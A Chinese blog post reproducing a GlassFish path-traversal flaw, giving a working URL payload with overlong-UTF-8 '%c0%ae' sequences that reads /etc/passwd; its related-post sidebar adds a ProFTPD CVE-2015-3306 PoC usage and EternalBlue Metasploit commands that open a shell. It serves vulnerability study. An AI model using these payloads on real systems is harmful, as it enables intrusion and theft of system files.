漏洞复现模块

最新推荐文章于 2024-06-09 16:06:06 发布
最新推荐文章于 2024-06-09 16:06:06 发布
阅读量1.6k 收藏
点赞数
分类专栏: 漏洞复现模块 文章标签: java servlet 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58033230/article/details/126470711
版权

glassfish任意文件读取

glassfish简介:

glassfish是一款web应用服务器,和tomcat一样,也是一款优秀的Servlet容器。

glassfish知识点:

META-INF目录实际上就是描述jar文件中的信息的一个目录。

漏洞原理:

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.
/theme/META-INF/目录下可以利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

漏洞复现

访问以下网址:
https://IP:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd发现已成功读取/etc/passwd内容
在这里插入图片描述

tstrivey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008由于广告模块取referer不严,导致一处sql注入漏洞.这篇文章主要介绍了PHPCMS2008广告模板SQL注入漏洞的相关资料,需要的朋友可以参考下
常见poc漏洞模块,直接导入用。
07-22
一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞
【WebLogic】Oracle发布WebLogic中间件2022年第1季度安全公告
cnskylee的博客
01-19 4415
Oracle于美国时间2022年1月18日发布了Oracle多款产品的季度累积补丁集,其中涉及Oracle WebLogic中间件的漏洞共 25 个,其中高危漏洞 1个,基础分值9.8分。 随着漏洞公告的正式发布,Oracle官方也为MOS授权用户提供了相关产品的补丁下载(包括服务延展补丁)。此外,Oracle JDK的两个主流版本的小版本号已经分别升级到了1.7.0_331、1.8.0_321。 截至1月19日上午8点40分,官方还未将相关版本的最...
第21篇:判断Weblogic详细版本号的方法总结
ABC_123的博客
09-04 5368
Part1 前言在日常的渗透测试、红队评估项目中,中间件层面的漏洞挖掘是非常重要一环,Weblogic中间件在最近几年接连被爆出很多高危漏洞,基本上都是可以直接拿到权限的。主流的Weblogic漏洞包括HTTP协议上的CVE-2017-10271、CVE-2019-2729等,但是其影响weblogic的版本为12.1.3之前版本。如果能事先判断出weblogic的版本号是大于12.1.3的,...
Zabbix-CVE-2022-23131复现
weixin_45794666的博客
02-24 1932
Zabbix-CVE-2022-23131 0x01漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 攻击条件限制: 需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默
无胁科技-TVD每日漏洞情报-2022-6-22
wuthreat无胁科技的博客
06-22 398
漏洞名称:Spring Data MongoDB SpEL表达式注入漏洞 漏洞级别:高危 漏洞编号:CVE-2022-22980 相关涉及:Spring Data MongoDB 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-12692漏洞名称:SAP Focused Run 缺乏身份验证检查漏洞 漏洞级别:高危 漏洞编号:CVE-2022-24396 相关涉及:SAP Focused Run 漏洞状态:未定义 参考链
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9590
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利
Weblogic 漏洞复现
Knsec
06-03 2572
Weblogic 漏洞复现
Windows CVE-2022-21907漏洞复现
热门推荐
执着
01-20 1万+
测试环境:虚拟机Windows 10 Windows版本:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务,蓝屏重启。 微软官方在第一时间修复此漏洞,据微软官方公布的此次漏洞影响范围: Windows Server 2019 (Server Core installation) Windows Server 201..
IIS解析漏洞复现
m0_56578216的博客
09-08 491
IIS的解析漏洞和nginx的背锅解析漏洞实际上相同,都是由于配置不当出现的漏洞,并且配置都是属于同一个,关于nginx的解析漏洞可以看我的这篇博客http://t.csdn.cn/BtyyJ。
CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞
weixin_45260839的博客
06-12 2255
CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞
实战CVE-2022-23131漏洞 | 身份认证绕过
qq_41132792的博客
07-27 988
Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标...
Apache HTTPD 漏洞复现
来日可期的博客
09-07 2230
Apache HTTPD 多后缀解析漏洞,Apache HTTPD 换行解析漏洞-CVE-2017-15715,Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773,Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013漏洞复现合集
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8608
CVE-2022-33891漏洞原理、环境搭建和复现
Zabbix登录绕过漏洞复现(CVE-2022-23131)
MrHatSec的博客
04-06 5898
Zabbix登录绕过漏洞复现(CVE-2022-23131)
简单的项目部署脚本(转载)
最新发布
u010230019的博客
06-09 435
有些项目团队喜欢使用docker启动java服务,那么我们同样可以将上述脚本稍做改造,来实现基于shell+docker的简单项目部署能力。可以将核心节点的错误或者失败内容通过webhook发送到对应的告警平台,比如钉钉、飞书机器人等。把~/.ssh/id_rsa.pub内容添加到远程仓库的ssh秘钥中。执行start.sh脚本打包部署。start.sh脚本内容。
EternalBlue漏洞复现
06-12
复现EternalBlue漏洞需要满足以下条件: 1. 目标机器必须是运行Windows XP至Windows Server 2012的系统,并且未安装相关补丁。 2. 目标机器开放了TCP端口445,并且RPC服务运行在这个端口上。 下面是EternalBlue漏洞复现步骤(仅用于安全研究和授权渗透测试,任何未经授权的攻击行为都是非法的): 1. 下载并安装Metasploit框架(https://www.metasploit.com/download)。 2. 启动Metasploit控制台,使用以下命令加载EternalBlue模块: ``` use exploit/windows/smb/ms17_010_eternalblue ``` 3. 配置目标机器的IP地址和端口号,使用以下命令: ``` set RHOSTS <目标机器IP地址> set RPORT 445 ``` 4. 执行攻击,使用以下命令: ``` exploit ``` 5. 如果攻击成功,Metasploit将显示一个shell会话,您可以使用它来执行任意命令。 请注意,EternalBlue漏洞的攻击性质非常严重,因此在进行渗透测试时,务必遵守相关法律法规和道德规范,避免造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值